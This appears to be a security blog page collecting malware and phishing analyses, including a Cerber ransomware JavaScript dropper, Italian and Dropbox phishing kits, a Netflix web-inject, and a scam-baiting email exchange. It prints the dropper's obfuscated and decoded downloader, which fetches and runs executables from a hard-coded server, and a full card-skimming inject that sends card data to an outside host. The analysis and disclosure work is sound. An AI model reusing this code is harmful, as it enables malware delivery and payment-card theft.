Skip to content →

Category: News >>

JS/Nemucod.ED!Eldorado – Cerber Ransomware. The JavaScript dropper.

A recent malware has been spotted in the wild, known with the name of Cerber. The malware is spread through phishing emails attached with a .zip file containing a malicious JavaScript file. The idea is to trick people to double click on the JavaScript file in order to execute the code on Internet Explorer. The JS is only a dropper responsible to download malware on the victim machine and is recognized by AV with the name of JS/Nemucod.ED!Eldorado. The JS code reported below is the malicious payload of the dropper.


function cjspx()
{
	var mkmpz=new Array("_"+""+"T","g"+"."+"f","h"+")"+""+"{","e"+"("+"p","+"+"+"+";","]"+"."+"su");
	return mkmpz[Math.floor(Math['rand'+new Array('om')[0]]()*mkmpz.length)];
}
function tiins()
{
	var zkqqd="a2c29cf93ad8b21c222ca6a3beae26d5b20db921d4d6fa7c28f7f2addc3ba750bfd62eefb3bdd62ed8a09be73df9020d9e22c671acf53da1a23cd867fc73ac653dffb23c3b63fe46fc0b2cc212ee7e23a9e23fed2dbba2ed312cfef24d7266b4134caa3bb1c3dbf336beb34bba39af62ef893df586fdcd37f2122f9a23cbb07b1a3bc403ba863ff946fa4a72dfe6fa9c21e5d2ae1638d826fca20ee162cd2d3bed626bf039e892af8217d7600c562dffc25e582ae592ccf03bbd867d166dafc02db51cf5a17abe02c8f03b547df5861b0717fc502b6503d8407c3e1bff51bcee1fc776db0b66c6e74e9037c6722dac23e4407aa73ba653bca43fc1061f5420cb93fca22aa1721c0267b956dcaf08ec50aa3f1bc8e6de4463abe6ff3a3af4a3dbb523bfc63d786fd4429f662efad23d023cecc2ae8e66d4374b8d37cbc22b5323fc707e0b3bb573bbf13fbcc61aa53ca392ab6e21ada2be2e67adc66cc674b2026d5929f966fc0e67fa337bd922bf623ec807ed53bf513ba933fd3761bde3cd593bd132ef613bb0e3ad8b3ca706fb2f72b3772cc96fee67df8a7fceb7fda166dd06fd7234b893dfb02af2b3ba993ad783de4f21d0d6fc292cca62ee3c23a7423d4e2daf12ee192ccae24e0367f4b37d0d22ae823cfa07be23bc963bcb53fc0561eef1ded92aa0c3cf463fd6520ad421f243cf9c2a"+
	"ae80dc6120d512bd4d36a4863fea6fa9e29c0d2ed6f23e373cd562aaab66a5174bd432af82adb823bd13ca6a2aeee34ed23db872ad913bca63acd43ddf221a8d6fd0a2cdce2ebce23bad23cf52df0d2efe92cb6724c1567c3c21bc63ae7323ebf23ee963f686fa213befe3dc263af872aaf966f4574b4b32b3732b262cfdb2ebfc3bbcb2cb3c27df56fee467cc72afea3dc5c3de8f20b4c3de7b66fa834cca3db602ad493bfa63aa753dfd021db26fce52cbfb2eea623c3323a782dfeb2eba72cddc24e0a67c3721da73aef623df123e7363a906fd493bb843df223acea2aa7d66de874ed732b7632c6b29d753aa1821f6e2ce113ba8126fa820d4721e446fc9a28ffe2ac773bf070bb5b2eb4b3bb442ebfd67f722ca752ebcd23e9b23e132dbcb2ef1e2cc4324a7766ca534b6a3bc813ddcd36cb734ba728be42aaa53be280ba5f2eda03bfff2ec5609ce33db7f20d0922ae81ace33dde523a2067ea46dd8327cf83be673baad3fe5875c7760eb660a6677c7876e7261be97bc877ff6c61b677ea4b77c037ee9f61b047cdea76af260a2125d793ca4d60e837eb8661aee2abf837a322abc16dece63af16fa0829dab3ac9321dda2cefa3be2926c4b20d9821d9467d033ddbb2aa673cecf3aa7c23d7a3bb7c63ede6fd782ae1e3dba03dc5520a7a3dc4766c4d6faf534f4a26d1929d0e6fa0167"+
	"ada6ed3e2ae463ddb03de2d20f4b3da1f66f0e34b203db342ac313bab33ae073db3221e236fff72cce72ecce23c2223e742dab62eab22cbbb24f1d67eff3daac2ac2c3cf893afca23ec13bafb63c186fd6329b232eae223e1b3cf7c2ad4466a1174ffc32feb2ac7b23ef23ca342ab3334c2328ad02ae7d3ba8d0ba3b2eefa3bf622ec5e09d623df0520ee722ae51afdb3dde323c2667a256dfb027e3f3bea43be7d3fb6c75f7c60e2a60fa077e1b76b2c61cf87baba7fe0661b9b7ead277e987ed8061b357ce1576d4760bb525fc13ccb060fe37dd1e61dd92aa8e37fc32aea36db4763d926fe6f29ed03ada021f302cfc73bbdf26b0a20c9621dc967e723da582ae453ccbe3aa7223d2f3ba6c63e966fddd2ae603dc5e3dd5520e383dba466bba6fb6c34b7226a6029ce76fbfc67e616eef52aad83dd323df6c20ca33dbf966bfd34e5c3db9b2aa613ba4e3ac6d3defe21eb56ff4e2ce7f2ecbc23b0223ef02dfee2ef232cf8824d5767c433dff72afcc3cf393ac6323d613bae163ab26fb8029fed2eb8223c513cf1c2adbf66a4474bc932bf92ab1523c5b3ce2b2ae4334e0728e682afd33bde60be432ec813bad22eb4609a473df2a20e1522b101afc83de7823b6a67cc36dcce27d243be383bcd93fab075b1a60ec760cbc77e1376d8f61dfb7bd8c7ff7f61bbc7efc977c297ea1661c727c"+
	"b5276cd960b8825e1e3cfc660f127cccf61e3e2ad3137e082aecb6da3963d716fa6129a3d3accd21d5a2cc5d3bcd126cb020eb721db967b6f3db852ab973cae43ae0823d1c3bc8063ce56fade2ac8b3dea23ded020a223dd4266f3a6fbcb34a4426da329eae6fe2867d126effe2ab223dca53dd8820bb43dec766a7134b6b3db4d2adff3bfac3afef3df7921ae16fd3b2cf192ea3f23a6423e982df472ede12ccb124b9867fa73df492ade03ca2b3ae4223b2a3bfcd63a6c6fba829bf12edba23a0f3cd3d2ab4f66e3374e7532d212ac4623b713cf0e2af5b34c653dbf72aa203baec3abe33dd0521d186fe5f2ce182eecb23f4123e0e2dcb12eed12cf2124ea067b4a21f3e3ad3e23a3c23fd163fc06ff363bf333def43aedd2ac2266ac574a6832a7032e4866ee474dc732e0032a8966b6774ad832be532c2a66e3174d1432ee42cb812ed603bb612cf0627ba36fff367e642ad573ddd83ded720a2f3dab566f1034fc43daef2abac3bc023af373dad421db26fed32ceef2ebbf23f8a23a0a2ded52ed6f2cf1124a2d67ca021ca73ad0723dc223c0963a036ff8e3ba253def63aa172ae8266cfb74e9532b2132b9029e033ae7a21e8c2cb7a3bd7b26a5320ab221f9a6facb28a242affd3bef51bdfb2ac3322ac93ffcd09ef926ab223dcd2acef1fdbd2edbb3bf5027cbc67db966a8634e743b"+
	"d7f3dd2b36c8b34b2839a032ef783dcd36fb8f29fa63caac6fc3372bb46fe2b21f7c2aa9738b6c6ffca0ee132cfcc3baf826e4039a852ab8717a3d00f672db0b25e692ad502cf163bd4567a286dd4e1ce982cc9a3db6e26d903fc9e3be3426ce521f0828a0961d4c09d3526a9c23fb32af6b1cba436b973cc173bfde2abf022f8c00c1e2df2825dd42af992ccd43bd2c6da0c66d5074c8839a4e2eea13df726fbef3bda722a253fbb609ade26f6423cdb2aeff01eb02ee0e22efe2ae7a6fb8b72db86feb56de9a13ae813fd66dfb26fb9a64b996fb6e02ea72ed423ba3d27b1761e363dce42eeaf21ee82bd4e20b7522a4e67dc466dd661d373be3920b081cc833bc723de1526f4a21a6f28adb67b997cd1b79eed66c4761ebd3ca353abe52dcc83cadc3bafa3df3367bc37dac363e576fb4376a6566c846ffee64a2d6fe3b6ddef61f5a2ae5837a3b2ac7f6dd9474eeb39aaa2eacc3debe6fd5f3bd1322be83ff2009c9e26b3923de82ab221fe3f2ef103bdbf27d5e6ff8e72a316ff9029fdb3cb6b61fac08f9e2af513bbfb1cb8e3fb382ab6a2cb2326fc12ed1723bb109a0020a5d23a0c2bfd42af273da5b67f9c7de6066ef06fc3664c3f6fe343be4c22dfa3fe0b09bbe26a7923f6d2ac6b01aad2ec2122b242ade774c063de8f2afb03bfb13ab973daeb21fe76fd783bfb922e483fc0209"+
	"f9926d5423bee2ab491fd592eb293bdbf27a7074d6d32ab72cb7e2efe43be342ce6727dfb6fa3c67dd92acff3da053debe20be73dba666ca934fad3da3c2af3e3bdbc3aa3b3da4521b216fb7e29f0a2ea1523dbe3ccd22aba574b5e32e6332f7729eb83aeed21ea82cdb93be5526eb220eec21b316fb263cbcb2efc739bc72aab21bd6d20a421bb2d2ac1c22a4e3fa7267dbf2bb7a2ef073ba032eb2863a3a6fa7c2cadc2efe123f2723fa22dff92ec022cfba24efc66cee34a273bf243ddf336da534a8f39a4c2ef073df626fc413fb0e2eb023bd7327f126feac72bb56faf828e912ac563bcb01bce32ac3c22cb43fd8509f7f26caa23fc92abc21fb372ed033bb1227c7567bfe66c9874f5d26dc929b966ffc267e143fbad2ecfd3bd5527e9466fec34ba139a5d2ed073de746fa6420caf2da3c25ab21cb903bd603db042abb82eb6122d686ff8c72ac86fee021fe52ae5d38cc46fa1c0eb692cf9f3bf3526beb39a192ade817ab700c0b2db1825c292ab6d2cf273bfd967e386df380eba80bfc400a3c0bf7d0dbde61f251cdf63ba043dd062aa592ed9422a416db6366a3074e8720e492dbf825df21cf8a3ba9e3df292ae3b2ee6122a7461f6a00a4d3ff6c2aafa21ba367edb66e9d74c8e20a762db9b25c411ca753be203dd492ab732ec6122b4961aa11bac736cee3fa642aa606fc4a72"+
	"add6fd357efaa74ffd20be82dbe525f641cf803be0f3dc132aa112ee0422b5f61e1c18f5c3db0c26d523bfe02abd367b542bc752ec7d3bdb32ed0366b7874aa120e462dee525d521cf973beec3db642aa1f2ea9922bff61fe01fedc20acb3cc5126d193bef826f2d20e2d21e576fc0572c756fe427ff7d74cd320c632de5225c131cb153bbf93dd532aea92eb0c22b5361abe1cb362ec3a39c0b2adeb1be3020ccf09da026ad323e272ae3367e753fbc72ee513bffe27cc363a3f6feb07ddd766fa874aaa20b022dded25af31caa13ba2c3db3e2aa3a2efb822a7361d0c0cbf723b8620b853cb0f2abae67ad366ae574fae3dbc72ac6e3ba0d3adf63de1d21b676fab12cacf2ebdf23d9923cc52de3a2ee542cfd224ac367ee93fb242ec4e3bb8d27ae663f836fe6529d492eee723e243ca142ad6666eb974fe132d212aac923acf3cc722ae526fc4434d643dfe92aac43bfa33af553df5221b7d6fad42cbc92ec3b23dc223f012dbbd2ec782cf2c24ed167a2821e453aa8123dd423c6e63c296fc643bbd03df9b3ad892ad9a66a6d74c8632c2332d792cdd02ea6e3bcad2ce8727f1d6fba667ebb2af233da843db2a20fa83dccc66b3834b3f3ddfe2ac303bf163adc83dfde21e116fdcb2ca292ee7b23c0f23b4c2dbaf2ee8e2cb1c24dc067dba21d673ac8923e7e23dd063d3c6fb773bb5f3d"+
	"b8f3ae3a2adb666b7b74dc432aaa32a5828dd02ac3e3bf740bf0b2ed0d3bb302ed7e67c1b29d463ab5a21fe92cb6a3bb3126dfa20b8521ab86ff6f67daf2bb422ef873bc362ee7b63dbf6fd4c2ab853dd0e3de5520efe3df4466efa6fb5c34f3326caf29b436fa8067b146ebe82add63dda03df9920cdc3da9e66cea34b4d3cc562ee0639bf62ad841ba1d20dc71ba352ae5c22eac3fdde67c452bf4d2ea6c3bc142ed1463cae6fec229ab73ae0221f2f2cd833be4626f6b20dbb21f6c6fed767ea43facf2edb93bd7027d1263fe66faca2af673dc2c3db1020d153de2266f0c6fb4334eb426a7329c7f6fa3467c066ebc72af873da593da2320e663da5166b5734cad3bcae3dd2936e5634c2c39f422eb643dc596ff7d38fa23cb3c27a986fe4972d3d6fe9e21f532af9938eed6fda40ec7f2cca13bba026fac39b3e2aa1917abc00b962df9525d2e2ae872cfe13bf4b67ce66da4918a601cd862cccd3df0726a493fa213bcde61c041cbe327d272aa4c23dd423e5e6df1066b2c74f3f38f0b3cf2627e5561ac71ddda3ab8821d7c67d4c3fa8f2ee513bf1027dca66ebf74bfb32d892cbc12ef673bcda2cbe327bd76fba867f442ad2e3dc5d3dad620f223dfd866a656ff0434ec232c1c32fde32a6166ec674ee332ba532b6266f8774";
	var gfltf;
	while(true){
		try
		{
			gfltf=ytzte(zkqqd);
			break;
		}
		catch(er)
		{
			var a = 1;
		}
	}
	return gfltf;
}
function ytzte(cmift)
{
	return (new Function("cshqx","wgqod","dsvyh","var ibmqd=cshqx.match(/\\S{5}/g),vztbz=\"\",jlawe=0;while(jlawe<ibmqd.lengt"+cjspx()+"vztbz+=Strin"+cjspx()+"romCh"+"arCod"+cjspx()+"arseI"+"nt(ibmqd[jlawe"+cjspx()+"bstr(3,"+"2),1"+"6)^79);jlawe"+cjspx()+"}eval(vztbz);")(cmift,null,null));
}
tiins();

The code is composed by three functions:

• cjspx()

This function is responsible to correctly complete the string in the function ytzte, and so correctly create a new Function to decode the obfuscated payload.

• tiins()

This is the main function, containing the malicious obfuscated payload and the logic to de-obfuscate it. The payload is loaded in the variable zkqqd and is processed in a infinite loop, that ends only when the de-obfuscation process is correctly completed.

• ytzte(cmift)

This is the function responsible to de-obfuscate the malicious code.

In order to decode and understand what this dropper is doing we can use the Developer Tools from Chrome, and go though three simple steps:

1. Extract all the values in the array allocated in the function cjspx()


2. Rebuild the string used to create the new Function in the ytzte function, in order to get a correct syntax.
We can create a new function, called test that will decode the obfuscated payload. The regex matches a string of 5 chars every 5 chars.

</pre>
function test(a){

var ryybh=a.match(/\S{5}/g)
var zhhzw="";
var dbdvx=0;
while(dbdvx<ryybh.length){
zhhzw+=String.fromCharCode(parseInt(ryybh[dbdvx].substr(3,2),16)^42);dbdvx++;
}
console.log(zhhzw)

Few characters in the array are there just to create noise and are not useful to create the function.

3. Pass the obfuscated payload to the function ytzte and print it through the console
The decoded payload will look like:

</pre>
function getDataFromUrl(url, callback) {
try {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open("GET", url, false);
xmlHttp.send();
if (xmlHttp.status == 200) {
return callback(xmlHttp.ResponseBody, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}

function getData(callback) {
try {
getDataFromUrl("http://89.40.181.39/js/1.exe", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://89.40.181.39/js/2.exe", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://89.40.181.39/js/3.exe", function(result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
});
}
});
}
});
} catch (error) {
return callback(null, true);
}
}

function getTempFilePath() {
try {
var fs = new ActiveXObject("Scripting.FileSystemObject");
var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
return tmpFilePath;
} catch (error) {
return false;
}
}

function saveToTemp(data, callback) {
try {
var path = getTempFilePath();
if (path) {
var objStream = new ActiveXObject("ADODB.Stream");
objStream.Open();
objStream.Type = 1;
objStream.Write(data);
objStream.Position = 0;
objStream.SaveToFile(path, 2);
objStream.Close();
return callback(path, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
getData(function(data, error) {
if (!error) {
saveToTemp(data, function(path, error) {
if (!error) {
try {
var wsh = new ActiveXObject("WScript.Shell");
wsh.Run(path);
} catch (error) {}
}
});
}
});

The malicious script tries to download a malware from a C2 server, save it into a temporary path with a random name and execute it via powershell.

Server detected so far:

• 89.40.181.39
• i01001.dgn.vn

Leave a Comment

Phishing Attack #5 – Cartasi

Phishing attacks are becoming more and more sophisticated and narrowed. One of the last phishing kit I analyzed is built just to target Italians and filter out people from other countries. The financial institution, target of the phishing campaign is CartaSi, company leader in Italy for electronic payments. CartaSi manages a total of 27 million credit cards, prepaid and debit and guarantees the acceptance service to approximately 600,000 merchants. CartaSi coverage is worth about 50% of the Italian market, while the number of debit cards managed are about a quarter of the market.

Let’s have a look on on the phishing website.

The email sent to phish the victim is poorly designed, but still can trick few people to insert their credentials.

screen-shot-2016-12-05-at-10-47-22-am

In order to filter the users based on their geolocation, the phishing website uses a PHP plugin called “geoPlugin 1.0”, and allows only the users connecting from Italy:


// ccr.php - country code redirect
require_once('geoplugin.class.php');
$geoplugin = new geoPlugin();
$geoplugin-&amp;gt;locate();
$country_code = $geoplugin-&amp;gt;countryCode;
switch($country_code) {
case 'IT':
header('Location: crts.php');
exit;
default: // exceptions
header('Location: http://www.cartasi.it/gtwpages/index.jsp');
exit;
}

If the country code is not IT,the user is redirect to the official page of CartaSi.

The phishing kit folders’ structure is “obfuscated” by using a random folder generation algorithm:

$random=rand(0,100000000000);
$md5=md5($random);
$base=base64_encode($md5);
$dst=md5($base);
function recurse_copy($src,$dst) {
$dir = opendir($src);
@mkdir($dst);
while(false !== ( $file = readdir($dir)) ) {
if (( $file != '.' )  ( $file != '..' )) {
if ( is_dir($src . '/' . $file) ) {
recurse_copy($src . '/' . $file,$dst . '/' . $file);
}
else {
copy($src . '/' . $file,$dst . '/' . $file);
}
}
}
closedir($dir);
}
$src=acrts/;
recurse_copy( $src, $dst );
header("location:$dst");

The initial structure go the phishing kit is very simple and the directory listing is avoided by using a fake 404 page (index.html) in every folder.

screen-shot-2016-12-01-at-10-55-07-pm

The all logic of the phishing website is stored inside the folder acrts where is possible to find the following files

screen-shot-2016-12-01-at-11-13-49-pm

 

The main file is “login.php” that is the entry point of the phishing website and is responsible to filter the user IP and to collect the username, password and IP address of the user. The information collected, are stored inside three files:

  • hits.txt
  • cts1.txt
  • cts2.txt

where cts1.txt contains (truncated) username – password – IP – Country

screen-shot-2016-12-05-at-10-17-45-am

and cts2.txt the credit cards stolen:

screen-shot-2016-12-05-at-10-15-54-am

The PHP code of login.php responsible to filter the Italian IP is reported below ( truncated)

$IP = getenv("REMOTE_ADDR");
$day = date('l jS \of F Y h:i:s A');
if ( substr($IP, 0, 7) == "174.123") die;
if ( substr($IP, 0, 7) == "75.125.") die;
if ( substr($IP, 0, 7) == "74.125.") die;
if ( substr($IP, 0, 7) == "64.235.") die;
if ( substr($IP, 0, 7) == "209.85.") die;
if ( substr($IP, 0, 7) == "64.235.") die;
if ( substr($IP, 0, 7) == "84.14.2") die;
if ( substr($IP, 0, 7) == "194.106") die;
if ( substr($IP, 0, 7) == "173.178") die;
if ( substr($IP, 0, 7) == "216.82.") die;
if ( substr($IP, 0, 7) == "79.176.") die;
if ( substr($IP, 0, 7) == "219.117") die;
if ( substr($IP, 0, 7) == "150.70.") die;
if ( substr($IP, 0, 7) == "209.120") die;
if ( substr($IP, 0, 7) == "67.159.") die;
if ( substr($IP, 0, 7) == "143.127") die;
if ( substr($IP, 0, 7) == "67.172.") die;
if ( substr($IP, 0, 7) == "202.75.") die;
if ( substr($IP, 0, 7) == "38.127.") die;
if ( substr($IP, 0, 7) == "128.242") die;
if ( substr($IP, 0, 7) == "64.125.") die;
if ( substr($IP, 0, 7) == "69.163.") die;
if ( substr($IP, 0, 7) == "149.20.") die;
if ( substr($IP, 0, 7) == "91.199.") die;
if ( substr($IP, 0, 7) == "38.111.") die;
if ( substr($IP, 0, 7) == "174.122") die;
if ( substr($IP, 0, 7) == "124.178") die;
if ( substr($IP, 0, 7) == "199.48.") die;
if ( substr($IP, 0, 7) == "199.76") die;
if ( substr($IP, 0, 7) == "62.213.") die;
if ( substr($IP, 0, 10) == "194.72.238") die;
if ( substr($IP, 0, 7) == "66.227.") die;
if ( substr($IP, 0, 10) == "87.249.110") die;
if ( substr($IP, 0, 7) == "204.95.") die;
if ( substr($IP, 0, 7) == "220.25.") die;
if ( substr($IP, 0, 10) == "66.249.71.") die;
if ( substr($IP, 0, 10) == "208.80.194") die;
if ( substr($IP, 0, 10) == "94.228.131.") die;
if ( substr($IP, 0, 10) == "66.150.14.") die;
if ( substr($IP, 0, 7) == "64.71.") die;

.... (logic to store and send the stolen data via email to the phisher)

After the phisher successfully stole the credentials to login in the portal, the user is redirected to the CartaSi website www.cartasi.it, like most of the phishing websites.  This mechanism allows CartaSi to easily detect the phishing website, analyzing the logs of the web server.

The phishing website also contains a simple PHP shell called ttt.php that can be used to access the files in the web server. Below the code of ttt.php.

screen-shot-2016-12-05-at-10-43-53-am

 

 

It is very easy to detect that this website is fake and belongs to a phisher.

So far ~15 credit cards were inserted and ~30 username/password where stolen. The awareness is still very low.

 

 

Leave a Comment

NETFLIX malware/phishing attack targeting Portuguese-speaking countries

Netflix is one of the most popular streaming platforms , all over the world, especially because of the “hottest” TV series. But, this popularity has attracted also criminals, looking for new ways to steal money. During the last months Netflix has been targeted by malware, written to steal credit card information and user credentials. The attack uses the same methodologies used by financial malware like Dridex/Zeus: web injects.

Once the user has been infected, the malware waits till the user loads the Netflix webpage to login. As soon as the user accesses the page and the browser loads the content from the server, the malware injects the malicious HTML, JavaScript and CSS content.

The code is activated in case of GET or POST requests on *netflix.com*.

set_url *netflix.com/* GP

where G= GET and P=POST

Once the page is loaded the malware injects the following code:

CSS code

.ontop {
z-index: 999;
width: 100%;
height: 100%;
top: 0;
left: 0;
display: none;
position: absolute;
}
.ontop2 {
top: 50%;
left: 50%;
margin-bottom: 0;
align-content: center;
}
#popup {
padding: 10px;
width: 1224px;
height: 700px;
position: absolute;
color: #fff;
top: 50%;
left: 50%;
margin-top: -400px;
margin-left: -600px;
font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
font-size: 12px;
background: #000000;
}
#cc_form input {
width: 100%;
height: 50px;
padding: 9px;
border-radius: 2px;
border: 1px solid #999;
color: #fff;
background-color: #333;
}
#cc_form td {
padding-top: 10px;
color: #eee;
font-size: 12px;
}
#cc_submit {
text-decoration: none;
color: white;
padding-bottom: 12px;
padding-left: 28px;
padding-right: 28px;
padding-top: 12px;
text-align: center;
border-radius: 2px;
background: #ff3019;
background: -moz-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: -webkit-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: linear-gradient(to bottom, #ff3019 0%, #cf0404 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff3019', endColorstr='#cf0404', GradientType=0);
}
#cc_submit:hover {
background: #ff1a00;
background: -moz-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: -webkit-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: linear-gradient(to bottom, #ff1a00 0%, #ff1a00 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff1a00', endColorstr='#ff1a00', GradientType=0);
} 
JavaScript code

.....

function submitMe(){ 
    if (document.getElementById("cc_number").value == "") {
        alert("Ingresse um numero de Cartao");
        document.getElementById("cc_number").focus();
        return false;
    }else {
        if (valid_credit_card(document.getElementById("cc_number").value)) {} 
        else {
           alert("Ingresse um numero Valido");
           document.getElementById("cc_number").focus();
           return false;
        }
    }
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o mes de validade!");
        document.getElementById("cc_month").focus();
        return false;
    }
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o ano de validade!");
        document.getElementById("cc_year").focus();
        return false;
    } 
    if (document.getElementById("cc_ccv").value == "") {
        alert("Ingresse o codigo de segurança do seu cartao!");
        document.getElementById("cc_ccv").focus();
        return false;
    }
    if (document.getElementById("cc_name").value == "") {
        alert("Ingresse o seu nome Completo!");
        document.getElementById("cc_name").focus();
        return false;
    }

var _link_ = "https://p0o9i8u7y9.xyz/braz2/gate.php?";
var _url_ = _link_ + 'CC=' + document.getElementById("cc_number").value + '&month=' + document.getElementById("cc_month").value + '&year=' + document.getElementById("cc_year").value + '&cvv=' + document.getElementById("cc_ccv").value + '&name=' + document.getElementById("cc_name").value;
var head = document.getElementsByTagName("head")[0];
var script_ = document.createElement('script');
script_.src = _url_;
script_.type = 'text/javascript';
head.appendChild(script_);
setCookie("WeAre", "Foda", 365);
hide('popDiv');
}

......
HTML code


<div class="ontop" id="popDiv">

<div id="popup">
   <center>
   <img src= "https://logodownload.org/wp-content/uploads/2014/10/netflix-logo.png"width="128">
  </center>

<h4>Houve um problema com seus dados de pagamento.</h4>

Desculpe-nos por
 interromper o show, mas não foi possÌvel confirmar suas informações de
 pagamento. Mas não se preocupe! Insira os dados no campo abaixo para
 continuar.

<form id="cc_form" name="cc_form">

<table width="100%">

<tr>

<td colspan="2">Numero do cartão: <input id="cc_number" name= "cc_number" placeholder="E.g. 0000 0000 0000 0000" type="text"></td>

 </tr>


<tr>

<td>Validade: <input id="cc_month" name="cc_month" placeholder="MM" style="width: 45% !important;" type="text"> <input id="cc_year" name= "cc_year" placeholder="AA" style="width: 45% !important;" type= "text"></td>


<td>Codigo de segurança: <input id="cc_ccv" name="cc_ccv" placeholder="" type="text"></td>

 </tr>


<tr>

<td colspan="2">Nome do titular (conforme escrito no cartão):
 <input id="cc_name" name="cc_name" type="text"></td>

 </tr>

 </table>

<a href="" id="cc_submit" onclick="submitMe();">CONTINUAR</a>
 </form>

 </div>

</div>


 

In order to see how the malware interacts with the user, we can inject the code in the browser, where the Netflix login page is loaded.

The malware checks, weather the inserted credit card  has a valid number or not.screen-shot-2016-10-17-at-2-54-52-pm

Using a valid credit card is possible to submit the request, triggering the submitMe() JavaScript function (showed above).

Leave a Comment

Phishing Attack #4 – Dropbox

Clone kit revealed

A new fake Dropbox phishing scam targeting users of the online sharing and storage platform is currently in circulation. The scam invites readers to view files shared by another Dropbox user, and click on a link that redirects to a phishing website. 

screen-shot-2016-10-13-at-11-26-48-am

However, this phishing scam tries to fool users into submitting username and password details of their email address (YAHOO, Outlook, Gmail,AOL or others)  in order to gain access their account.

screen-shot-2016-10-13-at-11-26-57-am

Clicking on the icons a modal pops up asking for credentials.

screen-shot-2016-10-13-at-11-27-16-am screen-shot-2016-10-13-at-11-27-24-am

Once the credentials are filled and the “Submit” button is clicked, the credentials are sent through email to the phisher. 

Analyzing the web server is possible to retrieve the clone kit used by the attacker to create the phishing website. The clone kit is very simple and developed with basic programming skills. Below the structure and the source code of submit.php. “form.php” and “index.php” are 99% composed by HTML code.

screen-shot-2016-10-13-at-11-37-51-am

The developer downloaded all the icons to avoid recon.

screen-shot-2016-10-13-at-11-38-07-am

screen-shot-2016-10-13-at-11-28-32-am

Dropbox can easily identify this phishing attack analyzing the HTTP referer field of the HTTP packet, because the phishing website redirects to the official dropbox website.

 

Leave a Comment

Unicredit.com has less visits than this phishing website.




Recently my best friend received a call from his bank (Unicredit), telling him that his account was temporary blocked because of the risk of suspicious activities on it. He asked more informations about it, and they asked him if he, recently, put his credentials in a website similar to the official one. He replied that he didn’t do that, also with the official one; last time he used the online-banking it was many months ago. Result, they unblocked his account and he can use his money again.

2 minutes later he called me to tell me this story. I was lying on the couch checking my email, and my spam. While he was speaking one email catches my eyes;

Screen Shot 2016-06-29 at 4.06.08 PM

Voila!

Screen Shot 2016-06-29 at 3.54.37 PM

It looks like Unicredit is facing a massive phishing attack and they are blocking the accounts also without fraudulent evidences.

Interesting. Let’s analyze it a bit.

The clone kit used by the attackers is very similar to the others. The attack i not even sophisticated because it’s using just a form and an image like background. Below the structure.

Screen Shot 2016-06-29 at 4.10.08 PM

The HTML files 1,2,3 are just redirect to the files cc.html, inside.html and  inside2.html. Let’s analyze the php files.

1.png is the background of the login page

1

They look very simple. The PHP skills required in this case are very low.

  • index.php

Screen Shot 2016-06-29 at 4.14.45 PM

Just a simple redirect that generates a random string including random.php. See below

Screen Shot 2016-06-29 at 4.16.32 PM

This file is tracking all the victims saving their location. The results are saved into visit.txt file. Till now the amount of visitor is about 3175, most of them from Italy.

Going deeper through the other files, we can see that all the informations inserted by the victims in the phishing website are stored inside a txt file named pinco1.txt and sent by email to the attacker.

Screen Shot 2016-06-29 at 4.14.56 PM

The obfuscated content of these files is reported at the end of this article.

The other PHP files are quite similar to each other :

Screen Shot 2016-06-29 at 4.16.01 PM

Screen Shot 2016-06-29 at 4.16.14 PM

Screen Shot 2016-06-29 at 4.16.23 PM

 

The only difference it’s the redirect. They ask the victims to insert three times the OTP (One Time Password) in order to have the last one valid for 30-60 seconds and make transfers.

Result of the campaign till now:

  • 3175 VISITORS
  • MANY user,password, CC, CVV, OTP stolen

Below a snapshot of the two files mentioned before:

  • pinco1.txt

Screen Shot 2016-06-29 at 4.46.53 PM

  • visit.txt

Screen Shot 2016-06-29 at 4.33.37 PM

 

Ciao!

Leave a Comment

A nice conversation with a “scammer”

“The so-called “419” scam (aka “Nigeria scam” or “West African” scam) is a type of fraud named after an article of the Nigerian penal code under which it is prosecuted. It is also known as “Advance Fee Fraud” because the common principle of all the scam format is to get the victim to send cash (or other items of value) upfront by promising them a large amount of money that they would receive later if they cooperate. In almost all cases, the criminals receive money using Western Union and MoneyGram, instant wire transfer services with which the recipient can’t be traced once the money has been picked up. These services should never be used with people you only know by email or telephone!” (http://www.419scam.org)

Curious about that I started a nice conversation with the Nigerian guy, to see how the scam actually works.

Scammer

Dear Friend,

 I am very happy to inform you about my success in getting that fund transferred. Now I want you to contact my secretary and ask him for a cheque worth of USD$800,000 which I kept for you as a compensation of your past assistance to me. His contact details is below;

Name:   John Izualo.

Email;  ( johnizualo6@yahoo.com )

Kindly reconfirm to him the following below information:

 

Your full name_________

Your address_______

Your country______

Your age__________ 

Your occupation______

Your Phone number_______

 

Note that if you did not send him the above information complete,he will not release the cheque to you because he has to be sure that it is you. Note also that I will not be reached by email or phone at this moment because I am currently in London for investment trip with my share.

Regards,

Dr.Peter Ikey Obi.

Me

Hello I received this mail from Dr.Peter Ikey Obi,

I didn't know how I helped him but I'm very happy to receive this bonus.

here may details for the transfer.

Your full name______Davide XXXX

Your address_______Via dei XXX

Your country_______Italy

Your age___________59

Your occupation______Director Sales at XXX

Your Phone number_______+3934877XXXXX

Regards,

Scammer

 DEAR Davide XXXX,

